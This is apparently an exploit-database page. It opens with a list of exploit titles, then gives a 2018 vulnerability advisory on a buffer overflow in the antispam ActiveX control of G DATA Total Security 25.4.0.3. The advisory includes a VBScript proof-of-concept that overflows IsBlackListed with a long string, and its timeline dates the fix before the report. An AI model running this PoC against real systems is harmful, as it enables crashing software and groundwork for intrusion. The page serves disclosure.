b374aca9a3
10 changes to exploits/shellcodes G DATA Total Security 25.4.0.3 - Activex Buffer Overflow Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit) HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit) HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit) IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit) IBM QRadar SIEM - Remote Code Execution (Metasploit) Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit) Apache CouchDB - Arbitrary Command Execution (Metasploit) phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit) Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit) Dolibarr 3.2.0 < Alpha - File Inclusion Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion Dolibarr ERP/CRM - OS Command Injection Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection Dolibarr CMS 3.5.3 - Multiple Vulnerabilities Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities Dolibarr 7.0.0 - SQL Injection Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection Dolibarr ERP CRM < 7.0.3 - PHP Code Injection Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution WAGO e!DISPLAY 7300T - Multiple Vulnerabilities QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
73 lines
No EOL
2.3 KiB
HTML
73 lines
No EOL
2.3 KiB
HTML
<!--
|
|
=====[ Tempest Security Intelligence - ADV-24/2018 ]===
|
|
|
|
G DATA TOTAL SECURITY v25.4.0.3 Activex Buffer Overflow
|
|
Author: Filipe Xavier Oliveira
|
|
Tempest Security Intelligence - Recife, Pernambuco - Brazil
|
|
|
|
=====[ Table of Contents]=====================================================
|
|
|
|
* Overview
|
|
* Detailed description
|
|
* Timeline of disclosure
|
|
* Thanks & Acknowledgements
|
|
* References
|
|
|
|
=====[ Overview]==============================================================
|
|
|
|
* System affected : G DATA TOTAL SECURITY [1].
|
|
* Software Version : 25.4.0.3 (other versions may also be affected).
|
|
* Impact : A user may be affected by opening a malicious black list
|
|
email in the antispam filter,
|
|
|
|
=====[ Detailed description]==================================================
|
|
The GDASPAMLib.AntiSpam ActiveX control ASK\GDASpam.dll in G DATA Total
|
|
Security 25.4.0.3 has a buffer overflow via a long IsBlackListed argument.
|
|
Through a long input in a member of class called Antispam, isblackedlist
|
|
class is vulnerable a buffer overflow.
|
|
|
|
A poc that causes a buffer overflow :
|
|
-->
|
|
|
|
<?XML version='1.0' standalone='yes' ?>
|
|
<package><job id='DoneInVBS' debug='false' error='true'>
|
|
<object classid='clsid:B9D1548D-4339-485A-ABA2-F9F9C1CBF8AC' id='target' />
|
|
<script language='vbscript'>
|
|
|
|
|
|
'for debugging/custom prolog
|
|
targetFile = "C:\Program Files\G DATA\TotalSecurity\ASK\GDASpam.dll"
|
|
prototype = "Function IsBlackListed ( ByVal strIP As String ) As Long"
|
|
memberName = "IsBlackListed"
|
|
progid = "GDASPAMLib.AntiSpam"
|
|
argCount = 1
|
|
|
|
arg1=String(14356, "A")
|
|
|
|
target.IsBlackListed arg1
|
|
|
|
</script></job></package>
|
|
|
|
<!--
|
|
=====[ Timeline of disclosure]===============================================
|
|
|
|
04/10/2018 - Vulnerability reported.
|
|
04/17/2018 - The vendor will fix the vulnerability.
|
|
05/24/2017 - Vulnerability fixed.
|
|
|
|
07/12/2018 - CVE assigned [1]
|
|
|
|
=====[ Thanks & Acknowledgements]============================================
|
|
|
|
- Tempest Security Intelligence / Tempest's Pentest Team [3]
|
|
|
|
=====[ References]===========================================================
|
|
|
|
[1] https://www.gdatasoftware.com/
|
|
|
|
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10018
|
|
|
|
[3] http://www.tempest.com.br
|
|
|
|
=====[ EOF]====================================================================
|
|
--> |